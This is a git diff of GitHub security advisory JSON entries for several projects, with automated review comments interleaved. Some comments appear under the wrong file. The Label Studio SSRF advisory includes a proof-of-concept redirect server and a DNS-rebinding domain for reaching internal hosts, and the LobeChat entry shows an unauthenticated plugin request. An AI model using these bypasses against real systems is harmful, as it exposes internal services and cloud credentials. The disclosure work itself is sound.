+++ b/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json 
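Review bot: `nvd_published_at` is `null` even though the entry aliases CVE-2020-10661 and links its NVD page; NVD does carry a publish date for this CVE, so the field looks unpopulated rather than unknown and should be filled in. The vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N` (CRITICAL) claims no privileges, but the text says an existing nested-path policy grants access to namespaces created later, i.e. the attacker already holds an authenticated token bound to such a policy, so PR:L fits the description; if CRITICAL is carried over from NVD, say so in details. Two smaller points: namespaces are, as far as I know, a Vault Enterprise feature, so the Go-module range will flag OSS dependents that cannot be affected, and `https://www.hashicorp.com/blog/category/vault/` is a category page rather than the specific HashiCorp bulletin for this issue.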
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-jgph-w8rh-xf5p", - "modified": "2024-01-25T22:19:28Z", + "modified": "2024-01-29T14:22:17Z", "published": "2024-01-23T12:49:10Z", "aliases": [ "CVE-2023-44401" ], "summary": "View permissions are bypassed for paginated lists of ORM data", - "details": "### Impact\n`canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page.\n\nNote that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se.\n\nThis has been fixed by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in your query results having less than the maximum number of records per page even when there are more pages of results.\n\nThis behaviour is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly.\n\nYou can choose to disable these permission checks by disabling the `CanViewPermission` plugin following the instructions in [overriding default plugins](https://docs.silverstripe.org/en/5/developer_guides/graphql/plugins/overview/#overriding-default-plugins).\n\nNote that this vulnerability does not affect version 3.x.\n\n### References\nhttps://www.silverstripe.org/download/security-releases/CVE-2023-44401\n", + "details": "### Impact\n`canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page.\n\nNote that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se.\n\nThis has been fixed by ensuring no new records are pulled in from the database after performing `canView` permission checks for 
each page of results. This may result in some pages in your query results having less than the maximum number of records per page even when there are more pages of results.\n\nThis behaviour is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly.\n\nYou can choose to disable these permission checks by disabling the `CanViewPermission` plugin following the instructions in [overriding default plugins](https://docs.silverstripe.org/en/5/developer_guides/graphql/plugins/overview/#overriding-default-plugins).\n\nNote that this vulnerability does not affect version 3.x.\n\n**Base CVSS:** [5.3](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C&version=3.1)\n**Reported by:** Eduard Briem from Hothouse Creative, Nelson\n\n### References\nhttps://www.silverstripe.org/download/security-releases/CVE-2023-44401\n", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json b/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json index fa15601785d99..bc8192b428c86 100644 --- a/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json +++ b/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jgxc-8mwq-9xqw", - "modified": "2024-01-22T21:25:52Z", + "modified": "2024-01-31T14:55:29Z", "published": "2024-01-22T06:30:32Z", "aliases": [ "CVE-2017-20189" 
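Review bot: The sentence `You can choose to disable these permission checks by disabling the CanViewPermission plugin` is phrased as a neutral option, but doing so reintroduces the `canView` bypass this advisory fixes, now for every result rather than only overflow pages; I'd qualify it with `Disabling the CanViewPermission plugin removes canView enforcement for all GraphQL ORM results and should only be done for schemas that expose no permission-restricted data.` The added `**Base CVSS:** [5.3](…)` link also embeds temporal metrics (`E:F/RL:O/RC:C`), so the calculator will display a lower temporal score than the 5.3 quoted; link the base vector only.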
@@ -9,7 +9,10 @@ "summary": "Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization", "details": "In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-m3r6-h7wv-7xxv/GHSA-m3r6-h7wv-7xxv.json b/advisories/github-reviewed/2024/01/GHSA-m3r6-h7wv-7xxv/GHSA-m3r6-h7wv-7xxv.json new file mode 100644 index 0000000000000..a9c514e2f1e51 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-m3r6-h7wv-7xxv/GHSA-m3r6-h7wv-7xxv.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3r6-h7wv-7xxv", + "modified": "2024-02-01T17:48:14Z", + "published": "2024-01-31T22:43:32Z", + "aliases": [ + "CVE-2024-23651" + ], + "summary": "BuildKit vulnerable to possible race condition with accessing subpaths from cache mounts", + "details": "### Impact\nTwo malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with `--mount=type=cache,source=...` options.\n\n### References\nhttps://www.openwall.com/lists/oss-security/2019/05/28/1\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23651" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4604" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:32Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file 
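Review bot: The only item under `### References` in details is `https://www.openwall.com/lists/oss-security/2019/05/28/1`, a 2019 oss-security post that predates BuildKit 0.12 and CVE-2024-23651 by years; this looks like a stale copy-paste and should be replaced with the 2024 oss-security disclosure for this issue, or dropped, since PR #4604 and the v0.12.5 tag are already in `references`. The workaround paragraph could also say explicitly that the race needs two build steps sharing the cache mount to run in parallel, since that is the condition operators can reason about when deciding whether an untrusted Dockerfile is exploitable in their setup.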
diff --git a/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json b/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json index 0f3711d9d1ba7..7b28095c15267 100644 --- a/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json +++ b/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json @@ -55,6 +55,10 @@ { "type": "PACKAGE", "url": "https://github.com/i3thuan5/TuiTse-TsuSin" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tuitse-tsusin/PYSEC-2024-22.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json b/advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json new file mode 100644 index 0000000000000..cbe05f4a6f0c3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m979-w9wj-qfj9", + "modified": "2024-01-30T23:40:43Z", + "published": "2024-01-30T23:40:43Z", + "aliases": [ + "CVE-2020-10660" + ], + "summary": "HashiCorp Vault Improper Privilege Management", + "details": "HashiCorp Vault and Vault Enterprise versions 0.9.0 through 1.3.3 may, under certain circumstances, have an Entity's Group membership inadvertently include Groups the Entity no longer has permissions to. Fixed in 1.3.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.9.0" + }, + { + "fixed": "1.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10660" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/pull/8606" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/18485ee9d4352ac8e8396c580b5941ccf8e5b31a" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#134-march-19th-2020" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:40:43Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json b/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json index 27c43790c1d4b..9a8bf7797bf5f 100644 --- a/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json +++ b/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json 
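Review bot: As with the sibling CVE-2020-10661 entry, `nvd_published_at` is `null` despite the NVD alias link, and `https://www.hashicorp.com/blog/category/vault/` is a generic category page rather than the bulletin for this issue; both should be corrected. The vector `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N` scores this as integrity-only with no privileges, yet the description is that an authenticated entity keeps membership in groups it was removed from, which presumably keeps the policies (and the read access) those groups confer, so PR:L and at least C:L seem more faithful than PR:N/C:N. If the vector is inherited from NVD, noting that in details would save reviewers re-deriving it.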
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mg2x-mggj-6955",
- "modified": "2024-01-24T21:13:06Z",
+ "modified": "2024-01-31T14:55:45Z",
 "published": "2024-01-24T15:30:30Z",
 "aliases": [
 "CVE-2023-51702"
@@ -9,7 +9,10 @@
 "summary": "Apache Airflow CNCF Kubernetes provider, Apache Airflow: Kubernetes configuration file saved without encryption in the Metadata and logged as plain text in the Triggerer service",
 "details": "Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster.\n\nThis behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 {
@@ -85,7 +88,7 @@
 "cwe_ids": [
 "CWE-312"
 ],
- "severity": "LOW",
+ "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2024-01-24T21:13:06Z",
 "nvd_published_at": "2024-01-24T13:15:08Z"
diff --git a/advisories/github-reviewed/2024/01/GHSA-mrx3-gxjx-hjqj/GHSA-mrx3-gxjx-hjqj.json b/advisories/github-reviewed/2024/01/GHSA-mrx3-gxjx-hjqj/GHSA-mrx3-gxjx-hjqj.json
new file mode 100644
index 0000000000000..f9d11fbe701f9
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-mrx3-gxjx-hjqj/GHSA-mrx3-gxjx-hjqj.json
@@ -0,0 +1,90 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mrx3-gxjx-hjqj",
+ "modified": "2024-01-30T19:34:57Z",
+ "published": "2024-01-29T22:30:54Z",
+ "aliases": [
+ "CVE-2024-23647"
+ ],
+ "summary": "Authentik vulnerable to PKCE downgrade attack",
+ "details": "## Summary\n\nPKCE is a very important countermeasure in OAuth2 , both for public and confidential clients. It protects against CSRF attacks and code injection attacks. Because of this bug, an attacker can circumvent the protection PKCE offers.\n\n## Patches\n\nauthentik 2023.8.7 and 2023.10.7 fix this issue.\n\n## Details\n\nThere is a bug in our implementation of PKCE that allows an attacker to circumvent the protection that PKCE offers. PKCE adds the `code_challenge’ parameter to the authorization request and adds the `code_verifier’ parameter to the token request. We recently fixed a downgrade attack (in v2023.8.5 and 2023.10.4) where if the attacker removed the `code_verifier’ parameter in the token request, authentik would allow the request to pass, thus circumventing PKCE’s protection. However, in the latest version of the software, another downgrade scenario is still possible: if the attacker removes the `code_challenge’ parameter from the authorization request, authentik will also not do the PKCE check.\n\nNote that this type of downgrade enables an attacker to perform a code injection attack, even if the OAuth client is using PKCE (which is supposed to protect against code injection attacks). To start the attack, the attacker must initiate the authorization process without that `code_challenge’ parameter in the authorization request. 
But this is easy to do (just use a phishing site or email to trick the user into clicking on a link that the attacker controls – the authorization link without that `code_challenge’ parameter).\n\nThe OAuth BCP (https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics) explicitly mentions this particular attack in section 2.1.1: “Authorization servers MUST mitigate PKCE Downgrade Attacks by ensuring that a token request containing a code_verifier parameter is accepted only if a code_challenge parameter was present in the authorization request, see Section 4.8.2 for details.”\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n- Email us at [security@goauthentik.io](mailto:security@goauthentik.io)\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "goauthentik.io"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2023.10.0"
+ },
+ {
+ "fixed": "2023.10.7"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2023.10.6"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "goauthentik.io"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2023.8.7"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2023.8.6"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/goauthentik/authentik/security/advisories/GHSA-mrx3-gxjx-hjqj"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23647"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/goauthentik/authentik"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ 
"github_reviewed": true,
+ "github_reviewed_at": "2024-01-29T22:30:54Z",
+ "nvd_published_at": "2024-01-30T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-p59w-9gqw-wj8r/GHSA-p59w-9gqw-wj8r.json b/advisories/github-reviewed/2024/01/GHSA-p59w-9gqw-wj8r/GHSA-p59w-9gqw-wj8r.json
new file mode 100644
index 0000000000000..14e611ac28a7b
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-p59w-9gqw-wj8r/GHSA-p59w-9gqw-wj8r.json
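Review bot: In the `details` markdown every parameter name is opened with a backtick but closed with a typographic right quote (`` `code_challenge’ ``, `` `code_verifier’ ``, six occurrences across the Details paragraphs), so the inline code spans never terminate and the rendered advisory is garbled from the first occurrence onward; each closing `’` should be a backtick. The remaining `’` in `PKCE’s` is a genuine apostrophe and can stay. The two `affected` entries (`0` → `2023.8.7` and `2023.10.0` → `2023.10.7`) are otherwise consistent with the `Patches` section.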
@@ -0,0 +1,81 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p59w-9gqw-wj8r",
+ "modified": "2024-01-31T20:25:33Z",
+ "published": "2024-01-31T18:04:40Z",
+ "aliases": [
+ "CVE-2023-47116"
+ ],
+ "summary": "Label Studio SSRF on Import Bypassing `SSRF_PROTECTION_ENABLED` Protections",
+ "details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to [`1.11.0`](https://github.com/HumanSignal/label-studio/releases/tag/1.11.0) and was tested on version `1.8.2`.\n\n# Overview\n\nLabel Studio's SSRF protections that can be enabled by setting the `SSRF_PROTECTION_ENABLED` environment variable can be bypassed to access internal web servers. This is because the current SSRF validation is done by executing a single DNS lookup to verify that the IP address is not in an excluded subnet range. This protection can be bypassed by either using HTTP redirection or performing a [DNS rebinding attack](https://en.wikipedia.org/wiki/DNS_rebinding).\n\n# Description\n\nThe following `tasks_from_url` method in [`label_studio/data_import/uploader.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_import/uploader.py#L127-L155) performs the SSRF validation (`validate_upload_url`) before sending the request.\n\n```python\ndef tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):\n \"\"\"Download file using URL and read tasks from it\"\"\"\n # process URL with tasks\n try:\n filename = url.rsplit('/', 1)[-1]\n\n validate_upload_url(url, block_local_urls=settings.SSRF_PROTECTION_ENABLED)\n # Reason for #nosec: url has been validated as SSRF safe by the\n # validation check above.\n response = requests.get(\n url, verify=False, headers={'Accept-Encoding': None}\n ) # nosec\n file_content = response.content\n 
check_tasks_max_file_size(int(response.headers['content-length']))\n file_upload = create_file_upload(\n user, project, SimpleUploadedFile(filename, file_content)\n )\n if file_upload.format_could_be_tasks_list:\n could_be_tasks_list = True\n file_upload_ids.append(file_upload.id)\n tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(\n project, file_upload_ids\n )\n\n except ValidationError as e:\n raise e\n except Exception as e:\n raise ValidationError(str(e))\n return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list\n```\n\nThe `validate_upload_url` code in [`label_studio/core/utils/io.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/core/utils/io.py#L174-L209) is shown below.\n\n```python\ndef validate_upload_url(url, block_local_urls=True):\n \"\"\"Utility function for defending against SSRF attacks. Raises\n - InvalidUploadUrlError if the url is not HTTP[S], or if block_local_urls is enabled\n and the URL resolves to a local address.\n - LabelStudioApiException if the hostname cannot be resolved\n\n :param url: Url to be checked for validity/safety,\n :param block_local_urls: Whether urls that resolve to local/private networks should be allowed.\n \"\"\"\n\n parsed_url = parse_url(url)\n\n if parsed_url.scheme not in ('http', 'https'):\n raise InvalidUploadUrlError\n\n domain = parsed_url.host\n try:\n ip = socket.gethostbyname(domain)\n except socket.error:\n from core.utils.exceptions import LabelStudioAPIException\n raise LabelStudioAPIException(f\"Can't resolve hostname {domain}\")\n\n if not block_local_urls:\n return\n\n if ip == '0.0.0.0': # nosec\n raise InvalidUploadUrlError\n local_subnets = [\n '127.0.0.0/8',\n '10.0.0.0/8',\n '172.16.0.0/12',\n '192.168.0.0/16',\n ]\n for subnet in local_subnets:\n if ipaddress.ip_address(ip) in ipaddress.ip_network(subnet):\n raise InvalidUploadUrlError\n```\n\nThe issue here is the SSRF validation is only performed before the request is sent, 
and does not validate the destination IP address. Therefore, an attacker can either redirect the request or perform a DNS rebinding attack to bypass this protection.\n\n# Proof of Concept\n\nBoth the HTTP redirection and DNS rebinding methods for bypassing Label Studio's SSRF protections are explained below.\n\n### HTTP Redirection\n\nThe python `requests` module automatically follows HTTP redirects (eg. response code `301` and `302`). Therefore, an attacker could use a URL shortener (eg. `https://www.shorturl.at/`) or host the following Python code on an external server to redirect request from a Label Studio server to an internal web server.\n\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass RedirectHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(301)\n # skip first slash\n self.send_header('Location', self.path[1:])\n self.end_headers()\n\nHTTPServer((\"\", 8080), RedirectHandler).serve_forever()\n```\n\n### DNS Rebinding Attack\n\nDNS rebinding can bypass SSRF protections by resolving to an external IP address for the first resolution, but when the request is sent resolves to an internal IP address that is blocked. For an example, the domain `7f000001.030d1fd6.rbndr.us` will randomly switch between the IP address `3.13.31.214` that is not blocked to `127.0.0.1` which is not allowed.\n\n# Impact\n\nSSRF vulnerabilities pose a significant risk on cloud environments, since instance credentials are managed by internal web APIs. 
An attacker can bypass Label Studio's SSRF protections to access internal web servers and partially compromise the confidentiality of those internal servers.\n\n# Remediation Advice\n\n* Before saving any responses, validate the destination IP address is not in the deny list.\n* Consider blocking internal cloud API IP ranges to mitigate the risk of compromising cloud credentials.\n\n# Discovered\n- August 2023, Alex Brown, elttam",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "label-studio"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.11.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-p59w-9gqw-wj8r"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47116"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/HumanSignal/label-studio/commit/55dd6af4716b92f2bb213fe461d1ffbc380c6a64"
+ },
+ {
+ "type": "WEB",
+ "url": "https://en.wikipedia.org/wiki/DNS_rebinding"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/HumanSignal/label-studio"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/core/utils/io.py#L174-L209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_import/uploader.py#L127-L155"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.11.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T18:04:40Z",
+ "nvd_published_at": "2024-01-31T17:15:13Z"
+ }
+}
\ No newline at end of file
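Review bot: The CVSS vector on the new side says `PR:N`, yet the `tasks_from_url` code quoted in `details` receives a `user` and a `project`, which suggests the URL-import path is reachable only by an authenticated project member; if that holds the vector should be `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N` (4.3, still MODERATE, so `database_specific.severity` would not change). Confirm the privilege requirement against the project's import API before editing the score. The reference list is well chosen otherwise — the pinned `blob/1.8.2/...` links and the fix commit let a reader check the remediation described in the text.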
diff --git a/advisories/github-reviewed/2024/01/GHSA-p6rp-mx85-m459/GHSA-p6rp-mx85-m459.json b/advisories/github-reviewed/2024/01/GHSA-p6rp-mx85-m459/GHSA-p6rp-mx85-m459.json
new file mode 100644
index 0000000000000..b6171c4967470
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-p6rp-mx85-m459/GHSA-p6rp-mx85-m459.json
@@ -0,0 +1,102 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p6rp-mx85-m459",
+ "modified": "2024-01-31T18:07:41Z",
+ "published": "2024-01-31T09:30:18Z",
+ "aliases": [
+ "CVE-2024-22236"
+ ],
+ "summary": "Spring Cloud Contract vulnerable to local information disclosure",
+ "details": "In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.springframework.cloud:spring-cloud-contract-shade"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.1.0"
+ },
+ {
+ "fixed": "4.1.1"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "4.1.0"
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.springframework.cloud:spring-cloud-contract-shade"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0"
+ },
+ {
+ "fixed": "4.0.5"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.springframework.cloud:spring-cloud-contract-shade"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.1.0"
+ },
+ {
+ "fixed": "3.1.10"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22236"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/spring-cloud/spring-cloud-contract"
+ },
+ {
+ "type": "WEB",
+ "url": "https://spring.io/security/cve-2024-22236"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T18:07:41Z",
+ 
"nvd_published_at": "2024-01-31T07:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json b/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json
new file mode 100644
index 0000000000000..04717cdb3467d
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json
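Review bot: `cwe_ids` is left as an empty array (with a stray whitespace-only line inside the brackets) even though `details` names the weakness precisely — a temporary directory created with unsafe permissions — for which CWE-377 (Insecure Temporary File) and CWE-276 (Incorrect Default Permissions) are the usual classifications; at least one of them should be recorded so the advisory is searchable by weakness. The first `affected` entry also carries `"versions": ["4.1.0"]` while the 4.0.x and 3.1.x entries have no `versions` list; either drop it or enumerate the affected versions for all three ranges so the entries are shaped alike.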
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pf55-fj96-xf37",
+ "modified": "2024-01-31T20:25:37Z",
+ "published": "2024-01-31T18:04:55Z",
+ "aliases": [
+ "CVE-2024-24566"
+ ],
+ "summary": "@lobehub/chat vulnerable to unauthorized access to plugins",
+ "details": "###\tDescription:\nWhen the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password).\n###\tProof-of-Concept:\nLet’s suppose that application has been deployed with following command:\n```sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat```\nDue to the utilization of the `ACCESS_CODE`, access to the chat is possible only after entering the password:\n \n![image](https://raw.githubusercontent.com/dastaj/assets/main/others/image.png)\n\n\nHowever, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. \nExample HTTP request:\n```\nPOST /api/plugin/gateway HTTP/1.1\nHost: localhost:3210\nContent-Length: 1276\n\n{\"apiName\":\"checkWeatherUsingGET\",\"arguments\":\"{\\n \\\"location\\\": \\\"London\\\"\\n}\",\"identifier\":\"WeatherGPT\",\"type\":\"default\",\"manifest\":{\"api\":[{\"description\":\"Get current weather 